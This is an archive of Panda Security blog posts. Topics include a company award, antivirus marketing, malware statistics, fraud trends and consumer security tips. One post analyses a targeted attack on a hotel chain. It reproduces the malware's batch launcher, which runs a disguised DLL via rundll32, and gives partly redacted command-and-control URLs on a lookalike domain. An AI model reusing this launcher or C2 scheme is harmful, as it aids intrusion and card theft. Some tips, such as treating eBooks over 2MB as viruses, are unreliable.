Tag Archives: Panda Security

Panda Security

Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento”

Leave a comment

el-suplemento-pandaPanda Security has been awarded Company of the Year at the 5th Annual “Premios Nacionales El Suplemento“.

Organized by the Spanish newspaper El Suplemento by ABC, at the “Premios Nacionales El Suplemento” well-deserved recognition is given to outstanding businesses and their hardworking professionals, who,  despite the current economy, are boosting their efforts to be better leaders, stepup and grow, on a daily basis.

The gala honored 34 winners, with one winner in each category.  Panda Security was awarded the night’s most coveted prize: Company of the Year. The company joined a group of exceptional winners—highlighting important professionals and Spanish companies, or businesses with headquarters in Spain—who have excelled in different sectors by their innovative work, growth, outreach , and history.

 

el-suplemento-panda-rosa-diaz

Center: Rosa Díaz, the General Director of Panda Security Spain, collected the award on behalf of the Bilbao-based, computer security company.

Although Panda Security is mostly known as an anti-virus software company, it has expanded its line of business to advanced cyber security technology. Rosa Díaz said that, thanks to Adaptive Defense 360, Panda is a pioneer in uniting EPP and EDR systems in the same solution.  The new security model is capable of monitoring, registering and categorizing all active processes on the system.

This year, some of the highlighted winners include Turkish Airlines in the “Airline” category, the NGO Messengers of Peace in “Solidarity”, and Kone for his work in “Sustainability”, among others.

Technological milestones deserve an award

Panda Security is one of the leading manufacturers of security software in the world.  They are included in Truffle 100´s list of Top European Software Vendors.

Among its milestones in technology, the pioneer has also launched security systems with concepts like SaaS (Security as a Service), or the anti-virus that protects from the Cloud (Cloud Computing). Panda is also recognized as the first security service provider to offer daily updates of your database signatures.

Panda Security also introduced the first automatic detection, analysis and classification of malware in real-time for systems.  This is called Collective Intelligence” and, together with patented technology that blocks unknown viruses, is the precursor of Panda´s new security model: Adaptive Defense.

It is our desire that these awards will encourage professionals and companies to continue their innovation, outreach and in good practices.

 

Congratulations to all the winners!

The post Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento” appeared first on Panda Security Mediacenter.

Panda Security

Panda Security, the tested anti-virus

Leave a comment

antivirus panda security

Be careful! Not all anti-virus systems are what they seem and many are more hazardous than helpful for your cyber security, so was said in a recent investigation.  The investigation concluded that, today, most anti-virus’ tend to lower the threshold of Internet browser security.  Can they protect us against external threats?  How effective are they?

Traditionally, browsers incorporate tools to check certificates issued by websites to ensure that it has been issued by an appropriate entity. Panda Security’s products do not use interception techniques like intrusive man-in-the-middle through TLS proxies, to analyze our customers’ communications. Our solutions are completely transparent and do not install any type of certificate for this function. Thanks to this we can avoid these type of vulnerabilities, while minimizing the impact on the communication performance for our users’ devices. For this reason, Panda solutions are not included in the study.

Panda Antivirus, the “nonvulnerable”

Panda’s products are mentioned as those not affected by this vulnerability in Concordia University’s report.

The affected anti-virus systems in the study trick browsers, causing them to relax and trust any certificate, even though they shouldn´t. On the contrary, Panda Security solutions appears in this report because of its transparency and reliability for its users.

The post Panda Security, the tested anti-virus appeared first on Panda Security Mediacenter.

Panda Security

Advanced Attacks against Hotel Chains: A practical example

Leave a comment

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

advanced attacks hotels

This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Despite that the Word icon shows up, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file is shown below:

@echo off

start “” ROCA.ING.docx

Set xOS=x64

If “%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86

IF “%xOS%” == “x64” (start “” C:WindowsSysWOW64rundll32.exe adobeUpd.dll,Wenk)

IF “%xOS%” == “x86” (start “” C:WindowsSystem32rundll32.exe adobeUpd.dll,Wenk)

ping -n 12 localhost

As we can see, the first thing it does to its victim is open the Word document in order to run and complete the trick. Then, adobeUpd.dll runs with the parameter “Wenk”. While executed, it modifies the file and marks it as read-only and hidden, and creates an entry in the Windows registry that runs every time the computer is turned on.

Contact with a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

Then it downloads a file that contains the user of the given URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we try to download it, it is not available; it will not be in our customer system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same domain as our customer, except that they have “.com” while the attackers registered a domain with the same name but in Gabon (“.ga”). This way, the similarity to the domain name won’t attract attention if it is seen by the hotel’s security team when analyzing network traffic.

In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code adobeUpd.dll we can see that they are actually looking for a specific mark in this file, then it decrypts the data from it and runs it as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is specifically directed to this hotel chain. The criminals have already removed all traces of the server where you could connect to the malware, and as we aborted the attack we can only speculate what is what they were going to do next. In our experience, this type of attacks seeks to engage a team of the enterprise of the victim to then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.

The traditional anti-virus does not work against this type of attack, since they are threats created specifically for a victim and they always ensure that the malware is not detected by signatures, proactive technologies, etc. that current anti-malware solutions have built. That is why have EDR type of services (Endpoint Detection & Response) are equipped with advanced protection technology, something vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Panda Security

Cyber-criminals really “Like” Facebook

Leave a comment

facebook-one

With 1,590 million active users per month, Facebook is the Social Network. In fact, they just posted their quarterly earnings and they are up 50%. Cyber-criminals are aware of their success.

These platforms are the ideal place to “phish” for information. 18% of companies infected by malware were infected through social networks. Attackers pass as part of a company’s customer service team in order to steal sensitive data from consumers.

A recent study was released by the RSA organization proving that cyber-crime on social networks is a “global epidemic”. The RSA organization was founded by the creators of the encryption algorithm that is used every time we make a bank operation online or digitally sign something.

Cyber-crime in social networks

is a “global epidemic”

These platforms are not only hot-spots for attacks but they have also become the perfect forum for scammers to communicate. According to the study, there are more than 500 online fraud related groups with more than 220,000 members. The majority of these groups are public and visible.

Uncovering Credit Card Data

Fraudsters share information like credit card numbers accompanied by personal information and authorization codes, cyber-crime tutorials and other malware tools.

Proving this, the investigation invites us to write our CVV or CVV2 numbers in the Facebook search bar (those verification numbers on the back of a credit card). The result will surely surprise you: it is easier to find data from a stolen credit card than find an old friend you are trying to reconnect with.

facebook-2

In total, the RSA detected some 15,000 compromised credit cards publicized on social networks in the six months that the study lasted. He also discovered that many of these criminal groups focus their attacks on shops, banks and accounts of consumers in their area.

In China and Russia, platforms QQ and VKontakte are preferred by the scammers, while in the rest of the countries, Facebook remains the favorite. Unfortunately for us, cyber-criminals really “Like” Facebook.

The post Cyber-criminals really “Like” Facebook appeared first on Panda Security Mediacenter.

Panda Security

PandaLabs identifies 227,000 malware samples per day in the first quarter of 2016

Leave a comment

pandalabs-2016-04PandaLabs, Panda Security’s laboratory, outlined in this report the main cyber-security developments over the first months in 2016, showing statistics of malware and cyber-attacks in the first quarter of 2016. The amount of malware created continues to break records, with more than 20 million new samples identified, an average of 227,000 per day.

Cyber-crime does not stop

Cyber-criminals continue attacking without giving sensitive infrastructures the chance to take a break, as seen in the attack suffered by 21st Century Holdings, a clinic specialized in cancer treatments with headquarters in Florida. The clinic had to alert their 2.2 million patients and workers that their personal data might have been compromised.

The Rosen Hotels & Resort chain has been the victim of an attack that occurred between September 2014 and February 2016. The company alerted their clients who may have used a credit or debit card in their establishments over this time period that their data could have been stolen by the attackers.

Even the world’s most powerful governments haven’t been spared, such as the United States, where the Department of Defense has presented a rewards program called “Hack the Pentagon” in which rewards are offered to hackers who find security holes in the Pentagon’s web pages, applications and networks.

Smartphones are another easy target for cyber-criminals. SNAP is the name of a vulnerability that affects the LG G3 phones. The problem is due to an error in the implementation of LG notifications called Smart Notice, which allows JavaScript to be executed.

The growing sector, the Internet of Things, is also affected by this year’s criminal activity. In this area, we can see how something as innocent as a doorbell can be attacked. Manufacturers are becoming more aware of their product’s safety, in fact, General Motors just launched a new rewards program for hackers who are able to find vulnerabilities in their vehicles.

Q1 in numbers

The PandaLabs study shows that Trojans continue to be in the lead of all malware samples. Out all malware samples created in 2016, Trojans are number one with 66.81% of the total (an increase compared to last year), followed by viruses (15.98%), worms (11.01%), PUPs (4.22%) and aware/Spyware (1.98%):

pandalabs1

 

When we analyze the infections caused by malware worldwide, we find Trojans in the lead again. This is normal if we take into account the rise in ransomware infections, including the rise of Trojans, which is also one of the most popular attacks cyber-criminals use because it allows them to obtain money easily and securely. There are more and more companies whose networks are falling victim to these cyber-criminals and who are paying millions of euros to rescue their stolen information:

pandalabs2

According to PandaLabs, Asia and Latin America are the most affected regions

In this study we can find a table showing the countries with the highest and lowest infection rates in Q1 of 2016: Asia and Latin America (China leads the ranking with 51.35% of infections) are the most affected countries; while the Scandinavian countries have the lowest infection rates with (Sweden at the lowest at 19.80%).

 

pandalabs3pandalabs4If you want to know more about the specific attacks, be up to date with the latest research carried out by the FBI, and the latest news of the cyberwar, you can download the entire document here. We hope this is of interest to you!

The post PandaLabs identifies 227,000 malware samples per day in the first quarter of 2016 appeared first on Panda Security Mediacenter.

Panda Security

Science is one step closer to reading your mind

Leave a comment

electroencephalography

Fiction predicts Science

This past month, there was a giant development in science.  Once again, technology has caught up to what we thought was only imaginable. For the first time in history, a quadriplegic recovered mobility in one of his hands thanks to neuroprosthetics, which in this case, is the superhero combination of an implanted brain-chip and a sleeve made of electric bands.

Ian Burkhart, a 24-year-old American man, is paralyzed due to a spinal cord injury that was caused from a diving accident a few years ago.  What at first seemed like a hopeless predicament for him, has become a positive example for science and humanity.

Mind over Body

Burkhart continues to live a life of passion and purpose—coaching high schoolers, inspiring others through public speaking, and working towards his undergrad degree—while living by the quote “Success, it’s what you do with what you got”.

Swiping a credit-card or playing a bit of Guitar Hero are two simple things Burkhart thought he would never be able to do again.  He has been able to train his brain to exercise commands, which are later carried out using the implanted chip and electrode sleeve.  According to scientists, in a few years, many disabled and paralyzed people could be dressing and feeding themselves, completely independently.

DSC_0029

Work like a machine, or one day we could be controlled by one.

But, as always, with each new advancement comes challenges and opportunities for those who are looking to take advantage.  Which is why it is critical that we protect the sensitive data that has yet to be compromised: the information that is stored in our brains.

Expert Alfonso Muñoz, from Criptored, explained how EEG headbands are vulnerable to the same attacks as your smartphone or your computer, stating that “any type of attack can happen because, really, you are not copying waves, you are copying bits”. The security-risks associated with the possibility of registering brain waves are alarming. Muñoz warns about the future of “mental surveillance” and “brain hacking”.

Imagine that someone, somewhere could read your mind… spy on your thoughts. This fear has already been proven in rigorous academic studies. When it comes to this on-going marathon between humans and technology, even with the good, that we stay wary of possible intruders.  Like Muñoz said, “attacks have limitations“. However, “the truth is, the thought that it can be done, in a relatively simple way, is scary“.

Information from your brain can be removed without you knowing it

The post Science is one step closer to reading your mind appeared first on Panda Security Mediacenter.

Panda Security

Tips to help protect your professional Apps

Leave a comment

international-workers-day

Smartphones have become vital to our existence, accompanying us in our day-to-day lives, both at work and at home. Since May 1st is International Workers’ Day, we are celebrating by reviewing some of the top applications we believe are most useful for our professional success.

“Top” Apps for professionals

These app icons saturate our phone screens, but with good reason. Today, there is an app for everything. Apps offer a wide range of possibilities and solutions, helping us organize our tasks and merge our professional and personal lives.

  • Evernote: Positioning itself as the office of the future, this app allows you to write, compile, find and submit documents in any electronic device working in a synchronized manner.
  • Google Drive: Through the app you can create and access shared information through any device, making long-distance teamwork both easy and efficient.
  • Dropbox: This mass storage tool is one of the more popular apps, allowing you to share information using multiple devices.
  • Skype: With more than 300 million users, the mobile app includes many of the same benefits as the desktop version like video calls, audio calls, and messaging. This program has become an important tool for those who have work relationships abroad.
  • Hootsuite: This platform allows you to access various social media accounts from one place. It has become one of the star tools to manage your online social life, both for social network experts and regular users.
  • Salesforce: We cannot lose sight of one of the best business tools for CRM. This important application provides an interface for task management and case management. It also has a customer portal area, with social media plugins and analysis tools, allowing us to foster relationships with our clients and develop new ones.

Black Hats in your work environment?

 

Even though we do our best to make our Smartphones as secure as possible, sometimes there are vulnerabilities, like large amounts of malware waiting to take over your phone. As seen above, there are a variety of applications waiting to be downloaded and used to help you on your journey up the career ladder. However, we must keep in mind that there are some risks that come with installing anything downloaded off the internet.

Black Hats frequently use apps as keys to “get into” our phones. If you use them as work tools or to share sensitive and private data, you should think about downloading an antivirus.

We have some tips when downloading these applications. First of all, “avoid the black market” and download your apps in authorized stores that are reliable. Secondly, choose apps with official developers (these will always be more secure). Thirdly, pay attention to the number of downloads (if there are more than 1,000, we can consider it a popular app and reduce the possibilities of giving problems.) Lastly, review the feedback from other downloaders to make sure it is a good one.

Current Smartphone attacks have put device security and personal information in danger, which is especially hazardous when your devices are connected with your work-life. Prevention is the best possible thing you can do to guarantee your security.

Here at Panda Security, we hope you continue in the fight against cyber-threats and keep on protecting your work-life. Have a great weekend and a wonderful International Workers’ Day!

The post Tips to help protect your professional Apps appeared first on Panda Security Mediacenter.

Panda Security

The Hotel Sector: an easy target with juicy profits

Leave a comment

video-cover-02 (002)Stealing information and then holding it for ransom is a trendy cyber-attack that has arrived to the hotel sector.  PandaLabs, Panda Security’s anti-malware laboratory, is launching a study called  The Hotel Hijackers (download our guide here); a document that reviews the increasing tendency of cyber-attacks directed towards large hotel chains.

Research showed us that 2015 was the year for these type of attacks and we have detailed information on this type of intrusion and how this sector was largely affected worldwide, in many famous hotels like the Trump, Hilton and Starwood hotels.

Why the hotel sector?

Hotels make billions of dollars from the millions of guests that pass through their doors everyday and hotels keep all of their guests’ sensitive data on file, just waiting to be compromised, and cyber-criminals know it.

If you want to take a look to the Hotel Hijakers download our infographic or video:


 

 

The post The Hotel Sector: an easy target with juicy profits appeared first on Panda Security Mediacenter.

Panda Security

If you find a USB stick, resist the temptation to open it

Leave a comment

pendrive1

 

Beware of infected storage devices: USB flash drives, Floppy disks, CD-ROMs

Classic tricks never go out of style. A favorite trick in the cyber-crime world is done by infecting USB flash drives (or whatever method of storage that is used at the time… remember floppy disks and CD-ROMs?) to cast a malicious program onto the victim’s computer by taking advantage of our biggest human weakness: curiosity.

 

Maybe you think that there are only few who would fall into these traps, but the truth is that it’s a common occurrence. A group of researchers from the University of Illinois tested people’s “curiosity” and came up with an interesting conclusion: almost half took the bait.

 

Curious by nature

The study’s author spread 297 USB flash drives across campus to see what would happen. Almost half of the devices (48%) ended up in the USB port of someone else’s computer. Most of them later claimed that they plugged-in the USB in order to find its rightful owner and return it to them (68%). 18% admitted they did it out of curiosity.

 

The most alarming is not the number of people who fell into the temptation to look at what was stored on the device, but that they would look without taking proper precautions. Only ten people analyzed the USB stick using an antivirus.

 

Only ten people used an antivirus while

examining the contents of the USB stick

 

The five most naive victims admitted that they completely trusted their perating system, which unfortunately, was too hopeful. As the prestigious security expert Bruce Schneier stated, “the problem isn’t that people are idiots […] The problem is that operating systems trust random USB sticks.”

The post If you find a USB stick, resist the temptation to open it appeared first on Panda Security Mediacenter.

Panda Security

Tips to help shield your reading devices

Leave a comment

PandaSecurity_World_Book_Day

Today, April 23rd, we celebrate World Book Day. Literature has evolved greatly in recent times, both in the way we enjoy it and the way we consume it. How we read, in the digital realm, has changed. In today’s on-the-go society, it is becoming less and less common for people to use paperbacks or hardcovers, and is becoming more and more common that we use many different platforms to enjoy reading. Now we read from our smartphones, tablets, eBooks … Electronic ink has been imprinted in our lives. We read everything and anything from short stories to novels, the news to blogs… we turn them into trending topics. We even share excerpts from the books we read on social media. Stories become viral thanks to transmedia storytelling and techniques.

Not only are we seduced with words, but audiovisual content plays a very important role in grabbing our attention. New technology enriches our reading, using videos or photos to interact with the reader. We live in the era of Branded Content. Struggling brands position themselves in a way that seems “organic” in the minds of consumers by offering unique and high-quality content. Now we are fluent in a new language, digital language, and the language in which today’s literature is based on. We write simpler and add hyperlinks. Digital writing is intended to be enjoyed only on-screen, 100%.

Tips to safeguard your reading device

We often forget that a computer virus in Windows can be passed to a smartphone whether it’s an iOS or Android, and a lot of these viruses can even infect our eReaders. To prevent malware from damaging our reading device, whatever it is, we must follow these guidelines:

1- Beware of USB ports: we must first analyze anything that can be inserted into a computer or electronic device. This is the simplest and most popular way cybercriminals can infect our devices.

2- Only buy or download eBooks from legitimate online stores or known editorial pages.

3- Beware of file size: if we introduce some eBook DRM we must be wary if it occupies more than 2Mb, as it could possibly be a virus that could damage the device.

4- Install an eBooks library manager: if the eBook is a virus or has one, the manager will alert us.

Like always, prevention continues to be the best option to help us enjoy our reading (or browsing) safely. Happy World Book Day!

The post Tips to help shield your reading devices appeared first on Panda Security Mediacenter.